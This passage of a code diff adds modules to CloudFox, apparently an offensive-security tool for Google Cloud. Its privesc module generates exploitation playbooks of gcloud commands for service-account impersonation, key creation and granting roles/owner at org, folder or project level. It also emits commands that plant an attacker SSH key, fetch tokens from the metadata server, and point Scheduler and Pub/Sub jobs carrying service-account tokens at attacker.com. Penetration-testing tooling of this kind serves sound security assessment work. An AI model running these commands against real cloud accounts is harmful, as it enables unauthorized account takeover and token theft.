%s\n\n", + ipRange, + ) + } +} + +func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(projectID string, attachment networkendpointsservice.ServiceAttachment) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE ATTACHMENT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Target Service: %s\n"+ + "# Connection Preference: %s\n"+ + "# Connected Endpoints: %d\n"+ + "# NAT Subnets: %s\n", + attachment.Name, + attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + attachment.ConnectedEndpoints, + natSubnets, + ) + + if len(attachment.ConsumerAcceptLists) > 0 { + lootFile.Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + } + if len(attachment.ConsumerRejectLists) > 0 { + lootFile.Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + } + + // Add IAM bindings info + if len(attachment.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range attachment.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += "\n# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Describe service attachment:\n"+ + "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud compute service-attachments get-iam-policy %s --region=%s --project=%s\n\n", + attachment.Name, attachment.Region, attachment.ProjectID, + attachment.Name, attachment.Region, attachment.ProjectID, 
+ ) + + // If auto-accept, add exploitation command + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ + "# To connect from another project:\n"+ + "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ + " --region=%s \\\n"+ + " --network=ATTACKER_VPC \\\n"+ + " --address=RESERVED_IP \\\n"+ + " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", + attachment.Region, + attachment.ProjectID, attachment.Region, attachment.Name, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PrivateServiceConnectModule) getPSCEndpointsHeader() []string { + return []string{ + "Project", "Name", "Region", "Network", + "Subnet", "IP Address", "Target Type", "Target", "State", + } +} + +func (m *PrivateServiceConnectModule) getPrivateConnectionsHeader() []string { + return []string{ + "Project", "Name", "Network", "Service", + "Peering Name", "Reserved Ranges", "Accessible Services", + } +} + +func (m *PrivateServiceConnectModule) getServiceAttachmentsHeader() []string { + return []string{ + "Project", "Name", "Region", "Target Service", + "Accept Policy", "Connected", "NAT Subnets", "IAM Binding Role", "IAM Binding Principal", + } +} + +func (m *PrivateServiceConnectModule) pscEndpointsToTableBody(endpoints []networkendpointsservice.PrivateServiceConnectEndpoint) [][]string { + var body [][]string + for _, ep := range endpoints { + body = append(body, []string{ + m.GetProjectName(ep.ProjectID), ep.Name, ep.Region, + ep.Network, ep.Subnetwork, ep.IPAddress, 
ep.TargetType, ep.Target, ep.ConnectionState, + }) + } + return body +} + +func (m *PrivateServiceConnectModule) privateConnectionsToTableBody(conns []networkendpointsservice.PrivateConnection) [][]string { + var body [][]string + for _, conn := range conns { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), conn.Name, conn.Network, + conn.Service, conn.PeeringName, reservedRanges, accessibleServices, + }) + } + return body +} + +func (m *PrivateServiceConnectModule) serviceAttachmentsToTableBody(attachments []networkendpointsservice.ServiceAttachment) [][]string { + var body [][]string + for _, att := range attachments { + natSubnets := "-" + if len(att.NatSubnets) > 0 { + natSubnets = strings.Join(att.NatSubnets, ", ") + } + if len(att.IAMBindings) > 0 { + for _, binding := range att.IAMBindings { + body = append(body, []string{ + m.GetProjectName(att.ProjectID), att.Name, att.Region, + att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), + natSubnets, binding.Role, binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(att.ProjectID), att.Name, att.Region, + att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), + natSubnets, "-", "-", + }) + } + } + return body +} + +func (m *PrivateServiceConnectModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if eps, ok := m.ProjectPSCEndpoints[projectID]; ok && len(eps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "psc-endpoints", Header: m.getPSCEndpointsHeader(), Body: m.pscEndpointsToTableBody(eps), + }) + } + if conns, ok := 
m.ProjectPrivateConnections[projectID]; ok && len(conns) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "private-connections", Header: m.getPrivateConnectionsHeader(), Body: m.privateConnectionsToTableBody(conns), + }) + } + if atts, ok := m.ProjectServiceAttachments[projectID]; ok && len(atts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "service-attachments", Header: m.getServiceAttachmentsHeader(), Body: m.serviceAttachmentsToTableBody(atts), + }) + } + return tableFiles +} + +func (m *PrivateServiceConnectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectPSCEndpoints { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectPrivateConnections { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectServiceAttachments { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + outputData.ProjectLevelData[projectID] = PrivateServiceConnectOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), "private-service-connect") + } +} + +func (m 
*PrivateServiceConnectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allEndpoints := m.getAllPSCEndpoints() + if len(allEndpoints) > 0 { + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", Header: m.getPSCEndpointsHeader(), Body: m.pscEndpointsToTableBody(allEndpoints), + }) + } + + allConns := m.getAllPrivateConnections() + if len(allConns) > 0 { + tables = append(tables, internal.TableFile{ + Name: "private-connections", Header: m.getPrivateConnectionsHeader(), Body: m.privateConnectionsToTableBody(allConns), + }) + } + + allAtts := m.getAllServiceAttachments() + if len(allAtts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "service-attachments", Header: m.getServiceAttachmentsHeader(), Body: m.serviceAttachmentsToTableBody(allAtts), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := PrivateServiceConnectOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "private-service-connect") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go new file mode 100755 index 00000000..4bc819a9 --- /dev/null +++ b/gcp/commands/privesc.go @@ -0,0 +1,917 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + foxmapperservice 
"github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivescCommand = &cobra.Command{ + Use: globals.GCP_PRIVESC_MODULE_NAME, + Aliases: []string{"pe", "escalate", "priv"}, + Short: "Identify privilege escalation paths in GCP organizations, folders, and projects", + Long: `Analyze FoxMapper graph data to identify privilege escalation opportunities. + +This module uses FoxMapper's graph-based analysis to find principals with paths +to admin-level access within the GCP environment. + +Prerequisites: +- Run 'foxmapper gcp graph create' first to generate the graph data + +Features: +- Identifies principals with privilege escalation paths to admin +- Shows shortest paths to organization, folder, and project admins +- Detects scope-limited paths (OAuth scope restrictions) +- Generates exploitation playbooks + +Detected privilege escalation vectors include: +- Service Account Token Creation (getAccessToken, getOpenIdToken) +- Service Account Key Creation (serviceAccountKeys.create) +- IAM Policy Modification (setIamPolicy) +- Compute Instance Creation with privileged SA +- Cloud Functions/Run deployment with SA +- And 60+ more techniques + +Run 'foxmapper gcp graph create' to generate the graph, then use this module.`, + Run: runGCPPrivescCommand, +} + +type PrivescModule struct { + gcpinternal.BaseGCPModule + + // FoxMapper data + FoxMapperCache *gcpinternal.FoxMapperCache + Findings []foxmapperservice.PrivescFinding + OrgCache *gcpinternal.OrgCache + + // Loot + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type PrivescOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivescOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivescOutput) LootFiles() []internal.LootFile { return o.Loot } + +func 
runGCPPrivescCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PRIVESC_MODULE_NAME) + if err != nil { + return + } + + module := &PrivescModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Findings: []foxmapperservice.PrivescFinding{}, + LootMap: make(map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing privilege escalation paths using FoxMapper...", globals.GCP_PRIVESC_MODULE_NAME) + + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + logger.ErrorM("No FoxMapper data found. 
Run 'foxmapper gcp graph create' first.", globals.GCP_PRIVESC_MODULE_NAME) + logger.InfoM("FoxMapper creates a graph of IAM relationships for accurate privesc analysis.", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + // Get the FoxMapper service and analyze privesc + svc := m.FoxMapperCache.GetService() + m.Findings = svc.AnalyzePrivesc() + + // Generate loot + m.generateLoot() + + if len(m.Findings) == 0 { + logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + // Count statistics + adminCount := 0 + privescCount := 0 + orgReachable := 0 + folderReachable := 0 + projectReachable := 0 + + for _, f := range m.Findings { + if f.IsAdmin { + adminCount++ + } else if f.CanEscalate { + privescCount++ + if f.PathsToOrgAdmin > 0 { + orgReachable++ + } + if f.PathsToFolderAdmin > 0 { + folderReachable++ + } + if f.PathsToProjectAdmin > 0 { + projectReachable++ + } + } + } + + logger.SuccessM(fmt.Sprintf("Found %d admin(s) and %d principal(s) with privilege escalation paths", + adminCount, privescCount), globals.GCP_PRIVESC_MODULE_NAME) + + if privescCount > 0 { + logger.InfoM(fmt.Sprintf(" → %d can reach org admin, %d folder admin, %d project admin", + orgReachable, folderReachable, projectReachable), globals.GCP_PRIVESC_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *PrivescModule) generateLoot() { + // Loot is now generated per-project in writeHierarchicalOutput/writeFlatOutput +} + +// getPrivescExploitCommand returns specific exploitation commands for a privesc technique +// technique is the short reason, fullReason contains more details +func getPrivescExploitCommand(technique, fullReason, sourcePrincipal, targetPrincipal, project string) string { + // Clean target principal for use in commands + targetSA := targetPrincipal + if strings.HasPrefix(targetSA, "serviceAccount:") { + targetSA = strings.TrimPrefix(targetSA, "serviceAccount:") + } + if strings.HasPrefix(targetSA, "user:") { + targetSA = 
strings.TrimPrefix(targetSA, "user:") + } + + // Clean source principal + sourceSA := sourcePrincipal + if strings.HasPrefix(sourceSA, "serviceAccount:") { + sourceSA = strings.TrimPrefix(sourceSA, "serviceAccount:") + } + + // Combine technique and fullReason for matching + combinedLower := strings.ToLower(technique + " " + fullReason) + + switch { + // Service Account Token/Key Creation - most common privesc + case strings.Contains(combinedLower, "getaccesstoken") || strings.Contains(combinedLower, "generateaccesstoken") || + strings.Contains(combinedLower, "iam.serviceaccounts.getaccesstoken"): + return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", targetSA) + + case strings.Contains(combinedLower, "signblob") || strings.Contains(combinedLower, "iam.serviceaccounts.signblob"): + return fmt.Sprintf("gcloud iam service-accounts sign-blob --iam-account=%s input.txt output.sig", targetSA) + + case strings.Contains(combinedLower, "signjwt") || strings.Contains(combinedLower, "iam.serviceaccounts.signjwt"): + return fmt.Sprintf("gcloud iam service-accounts sign-jwt --iam-account=%s input.json output.jwt", targetSA) + + case strings.Contains(combinedLower, "serviceaccountkeys.create") || strings.Contains(combinedLower, "keys.create") || + strings.Contains(combinedLower, "iam.serviceaccountkeys.create"): + return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", targetSA) + + case strings.Contains(combinedLower, "generateidtoken") || strings.Contains(combinedLower, "openidtoken") || + strings.Contains(combinedLower, "iam.serviceaccounts.generateidtoken"): + return fmt.Sprintf("gcloud auth print-identity-token --impersonate-service-account=%s --audiences=https://example.com", targetSA) + + // Token Creator role - can impersonate + case strings.Contains(combinedLower, "tokencreator") || strings.Contains(combinedLower, "serviceaccounttokencreator"): + return fmt.Sprintf("# Has Token Creator role on 
target\ngcloud auth print-access-token --impersonate-service-account=%s", targetSA) + + // Service Account User role - can attach SA to resources + case strings.Contains(combinedLower, "serviceaccountuser") || strings.Contains(combinedLower, "actas") || + strings.Contains(combinedLower, "iam.serviceaccounts.actas"): + return fmt.Sprintf("# Has actAs permission - can attach this SA to compute resources\n# Option 1: Create VM with target SA\ngcloud compute instances create privesc-vm --service-account=%s --scopes=cloud-platform --zone=us-central1-a --project=%s\n\n# Option 2: Deploy Cloud Function with target SA\ngcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=%s --source=. --entry-point=main --project=%s", targetSA, project, targetSA, project) + + // Workload Identity - GKE pod can impersonate SA + case strings.Contains(combinedLower, "workload identity") || strings.Contains(combinedLower, "workloadidentity") || + strings.Contains(combinedLower, "gke") || strings.Contains(combinedLower, "kubernetes"): + return fmt.Sprintf("# Workload Identity binding - GKE pod can impersonate SA\n# From within the GKE pod:\ncurl -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/%s/token", targetSA) + + // IAM Policy Modification + case strings.Contains(combinedLower, "setiampolicy") || strings.Contains(combinedLower, "resourcemanager") || + strings.Contains(combinedLower, "iam.setiampolicy"): + if strings.Contains(combinedLower, "organization") || strings.Contains(combinedLower, "org") { + return fmt.Sprintf("# Can modify org IAM policy\ngcloud organizations add-iam-policy-binding ORG_ID --member=serviceAccount:%s --role=roles/owner", sourceSA) + } else if strings.Contains(combinedLower, "folder") { + return fmt.Sprintf("# Can modify folder IAM policy\ngcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=serviceAccount:%s --role=roles/owner", sourceSA) + } + return 
fmt.Sprintf("# Can modify project IAM policy\ngcloud projects add-iam-policy-binding %s --member=serviceAccount:%s --role=roles/owner", project, sourceSA) + + // Compute Instance Creation + case strings.Contains(combinedLower, "compute.instances.create") || strings.Contains(combinedLower, "create instance"): + return fmt.Sprintf("gcloud compute instances create privesc-vm --service-account=%s --scopes=cloud-platform --zone=us-central1-a --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "compute.instances.setserviceaccount"): + return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE_NAME --service-account=%s --scopes=cloud-platform --zone=ZONE --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "compute.instances.setmetadata") || strings.Contains(combinedLower, "ssh"): + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\" --zone=ZONE --project=%s", project) + + // Cloud Functions + case strings.Contains(combinedLower, "cloudfunctions.functions.create") || strings.Contains(combinedLower, "functions.create"): + return fmt.Sprintf("gcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=%s --source=. 
--entry-point=main --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "cloudfunctions.functions.update") || strings.Contains(combinedLower, "functions.update"): + return fmt.Sprintf("gcloud functions deploy FUNCTION_NAME --service-account=%s --project=%s", targetSA, project) + + // Cloud Run + case strings.Contains(combinedLower, "run.services.create") || strings.Contains(combinedLower, "cloudrun"): + return fmt.Sprintf("gcloud run deploy privesc-svc --image=gcr.io/%s/privesc-img --service-account=%s --region=us-central1 --project=%s", project, targetSA, project) + + case strings.Contains(combinedLower, "run.services.update"): + return fmt.Sprintf("gcloud run services update SERVICE_NAME --service-account=%s --region=REGION --project=%s", targetSA, project) + + // Cloud Scheduler + case strings.Contains(combinedLower, "cloudscheduler") || strings.Contains(combinedLower, "scheduler.jobs"): + return fmt.Sprintf("gcloud scheduler jobs create http privesc-job --schedule=\"* * * * *\" --uri=https://attacker.com/callback --oidc-service-account-email=%s --project=%s", targetSA, project) + + // Dataproc + case strings.Contains(combinedLower, "dataproc"): + return fmt.Sprintf("gcloud dataproc clusters create privesc-cluster --service-account=%s --region=us-central1 --project=%s", targetSA, project) + + // Composer + case strings.Contains(combinedLower, "composer"): + return fmt.Sprintf("gcloud composer environments create privesc-env --service-account=%s --location=us-central1 --project=%s", targetSA, project) + + // Workflows + case strings.Contains(combinedLower, "workflows"): + return fmt.Sprintf("gcloud workflows deploy privesc-workflow --source=workflow.yaml --service-account=%s --project=%s", targetSA, project) + + // Pub/Sub + case strings.Contains(combinedLower, "pubsub"): + return fmt.Sprintf("gcloud pubsub subscriptions create privesc-sub --topic=TOPIC --push-endpoint=https://attacker.com/endpoint --push-auth-service-account=%s 
--project=%s", targetSA, project) + + // Storage HMAC + case strings.Contains(combinedLower, "storage.hmackeys"): + return fmt.Sprintf("gsutil hmac create %s", targetSA) + + // Deployment Manager + case strings.Contains(combinedLower, "deploymentmanager"): + return fmt.Sprintf("gcloud deployment-manager deployments create privesc-deploy --config=deployment.yaml --project=%s", project) + + // API Keys + case strings.Contains(combinedLower, "apikeys"): + return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", project) + + // Org Policy + case strings.Contains(combinedLower, "orgpolicy"): + return fmt.Sprintf("gcloud org-policies set-policy policy.yaml --project=%s", project) + + // Generic IAM edge - likely token creator or actAs relationship + case strings.ToLower(technique) == "iam" || strings.Contains(combinedLower, "iam binding"): + // Check if target is a service account + if strings.Contains(targetSA, ".iam.gserviceaccount.com") || strings.Contains(targetSA, "@") { + return fmt.Sprintf("# IAM relationship allows impersonation of target SA\n# Try token generation:\ngcloud auth print-access-token --impersonate-service-account=%s\n\n# Or create SA key (if permitted):\ngcloud iam service-accounts keys create key.json --iam-account=%s", targetSA, targetSA) + } + return fmt.Sprintf("# IAM relationship to target principal\n# Check IAM bindings for specific permissions:\ngcloud iam service-accounts get-iam-policy %s", targetSA) + + default: + // Provide a helpful default with the most common privesc commands + if strings.Contains(targetSA, ".iam.gserviceaccount.com") { + return fmt.Sprintf("# %s\n# Target: %s\n\n# Try impersonation:\ngcloud auth print-access-token --impersonate-service-account=%s\n\n# Or create key:\ngcloud iam service-accounts keys create key.json --iam-account=%s", fullReason, targetSA, targetSA, targetSA) + } + return fmt.Sprintf("# %s\n# Target: %s", fullReason, targetSA) + } +} + +// writePrivescFindingToPlaybook writes a detailed 
privesc finding to the playbook +func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f foxmapperservice.PrivescFinding) { + // Get source principal's project + sourceProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + if sourceProject == "" { + sourceProject = "PROJECT" + } + + sb.WriteString(fmt.Sprintf("# %s (%s)\n", f.Principal, f.MemberType)) + confidenceNote := "" + if f.BestPathConfidence != "" && f.BestPathConfidence != "high" { + confidenceNote = fmt.Sprintf(" | Confidence: %s", f.BestPathConfidence) + } + sb.WriteString(fmt.Sprintf("# Shortest path: %d hops | Viable paths: %d%s\n", f.ShortestPathHops, f.ViablePathCount, confidenceNote)) + if f.ScopeBlockedCount > 0 { + sb.WriteString(fmt.Sprintf("# WARNING: %d paths blocked by OAuth scopes\n", f.ScopeBlockedCount)) + } + sb.WriteString("\n") + + // Show the best path with actual commands + if len(f.Paths) > 0 { + // Only show the best (first) path with commands + path := f.Paths[0] + + if path.ScopeBlocked { + sb.WriteString("# NOTE: This path may be blocked by OAuth scope restrictions\n\n") + } + + // If source is a service account, add impersonation + if strings.Contains(f.MemberType, "serviceAccount") || strings.Contains(f.Principal, ".iam.gserviceaccount.com") { + sb.WriteString(fmt.Sprintf("# Step 0: Impersonate the source service account\ngcloud config set auth/impersonate_service_account %s\n\n", f.Principal)) + } + + // Generate commands for each edge in the path + currentPrincipal := f.Principal + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + + // Use full reason if available, otherwise short reason + displayReason := edge.Reason + if displayReason == "" { + displayReason = 
edge.ShortReason + } + + sb.WriteString(fmt.Sprintf("# Step %d: %s%s\n", i+1, displayReason, annotations)) + + // Get the exploit command for this technique (pass both short and full reason) + cmd := getPrivescExploitCommand(edge.ShortReason, edge.Reason, currentPrincipal, edge.Destination, sourceProject) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + currentPrincipal = edge.Destination + } + + // Final note about admin access + targetAdmin := path.Destination + if strings.HasPrefix(targetAdmin, "serviceAccount:") { + targetAdmin = strings.TrimPrefix(targetAdmin, "serviceAccount:") + } + sb.WriteString(fmt.Sprintf("# Result: Now have %s admin access via %s\n", path.AdminLevel, targetAdmin)) + } + + sb.WriteString("\n# -----------------------------------------------------------------------------\n\n") +} + +func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PrivescModule) getHeader() []string { + return []string{ + "Project", + "Principal Type", + "Principal", + "Is Admin", + "Admin Level", + "Privesc To", + "Privesc Admin Level", + "Hops", + "Confidence", + "Permission", + } +} + +func (m *PrivescModule) findingsToTableBody() [][]string { + var body [][]string + for _, f := range m.Findings { + // Extract project from principal + project := extractProjectFromPrincipal(f.Principal, m.OrgCache) + if project == "" { + project = "-" + } + + isAdmin := "No" + if f.IsAdmin { + isAdmin = "Yes" + } + + adminLevel := f.HighestAdminLevel + if adminLevel == "" { + adminLevel = "-" + } + + // Privesc target + privescTo := "-" + privescAdminLevel := "-" + hops := "-" + confidence := "-" + permission := "-" + + if f.CanEscalate && len(f.Paths) > 0 { + // Get the best path info + bestPath := f.Paths[0] + privescTo = bestPath.Destination + // Clean up display + if strings.HasPrefix(privescTo, 
"serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + hops = fmt.Sprintf("%d", bestPath.HopCount) + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Get the permission from the first edge - prefer Reason over ShortReason + if len(bestPath.Edges) > 0 { + permission = extractPermissionFromEdge(bestPath.Edges[0]) + } + + // Format privesc admin level + // Try to get more info from the FoxMapper cache if available + var destNode *foxmapperservice.Node + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + destNode = m.FoxMapperCache.GetService().GetNode(bestPath.Destination) + } + + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + privescAdminLevel = bestPath.AdminLevel + } + } + + body = append(body, []string{ + project, + f.MemberType, + f.Principal, + isAdmin, + adminLevel, + privescTo, + 
privescAdminLevel, + hops, + confidence, + permission, + }) + } + return body +} + +// extractPermissionFromEdge extracts a clean permission string from an edge +func extractPermissionFromEdge(edge foxmapperservice.Edge) string { + reason := edge.Reason + if reason == "" { + reason = edge.ShortReason + } + + // Try to extract actual IAM permission patterns + reasonLower := strings.ToLower(reason) + + // Common permission patterns + switch { + case strings.Contains(reasonLower, "serviceaccounts.getaccesstoken") || strings.Contains(reasonLower, "getaccesstoken"): + return "iam.serviceAccounts.getAccessToken" + case strings.Contains(reasonLower, "serviceaccountkeys.create") || strings.Contains(reasonLower, "keys.create"): + return "iam.serviceAccountKeys.create" + case strings.Contains(reasonLower, "serviceaccounts.actas") || strings.Contains(reasonLower, "actas"): + return "iam.serviceAccounts.actAs" + case strings.Contains(reasonLower, "serviceaccounts.signblob") || strings.Contains(reasonLower, "signblob"): + return "iam.serviceAccounts.signBlob" + case strings.Contains(reasonLower, "serviceaccounts.signjwt") || strings.Contains(reasonLower, "signjwt"): + return "iam.serviceAccounts.signJwt" + case strings.Contains(reasonLower, "serviceaccounts.generateidtoken") || strings.Contains(reasonLower, "generateidtoken"): + return "iam.serviceAccounts.generateIdToken" + case strings.Contains(reasonLower, "getopenidtoken") || strings.Contains(reasonLower, "openidtoken") || + strings.Contains(reasonLower, "oidc token"): + return "iam.serviceAccounts.getOpenIdToken" + case strings.Contains(reasonLower, "tokencreator"): + return "roles/iam.serviceAccountTokenCreator" + case strings.Contains(reasonLower, "serviceaccountuser"): + return "roles/iam.serviceAccountUser" + case strings.Contains(reasonLower, "workload identity") || strings.Contains(reasonLower, "workloadidentity"): + return "Workload Identity binding" + case strings.Contains(reasonLower, "setiampolicy"): + return 
"*.setIamPolicy" + case strings.Contains(reasonLower, "compute.instances.create"): + return "compute.instances.create" + case strings.Contains(reasonLower, "cloudfunctions.functions.create"): + return "cloudfunctions.functions.create" + case strings.Contains(reasonLower, "run.services.create"): + return "run.services.create" + case strings.Contains(reasonLower, "owner"): + return "roles/owner" + case strings.Contains(reasonLower, "editor"): + return "roles/editor" + } + + // If we have a short reason that looks like a permission, use it + if edge.ShortReason != "" && edge.ShortReason != "IAM" { + return edge.ShortReason + } + + // Default to the reason if nothing else matches + return reason +} + +// extractProjectFromPrincipal extracts project ID from a service account email. +// If orgCache is provided, it resolves project numbers to IDs. +// e.g., "sa@my-project.iam.gserviceaccount.com" -> "my-project" +func extractProjectFromPrincipal(principal string, orgCache ...*gcpinternal.OrgCache) string { + var cache *gcpinternal.OrgCache + if len(orgCache) > 0 { + cache = orgCache[0] + } + + // Helper to resolve a project number to ID via OrgCache + resolveNumber := func(number string) string { + if cache != nil && cache.IsPopulated() { + if resolved := cache.GetProjectIDByNumber(number); resolved != "" { + return resolved + } + } + return "" + } + + parts := strings.Split(principal, "@") + if len(parts) != 2 { + return "" + } + prefix := parts[0] + domain := parts[1] + + // Pattern: name@project-id.iam.gserviceaccount.com (regular SAs) + // But NOT gcp-sa-* 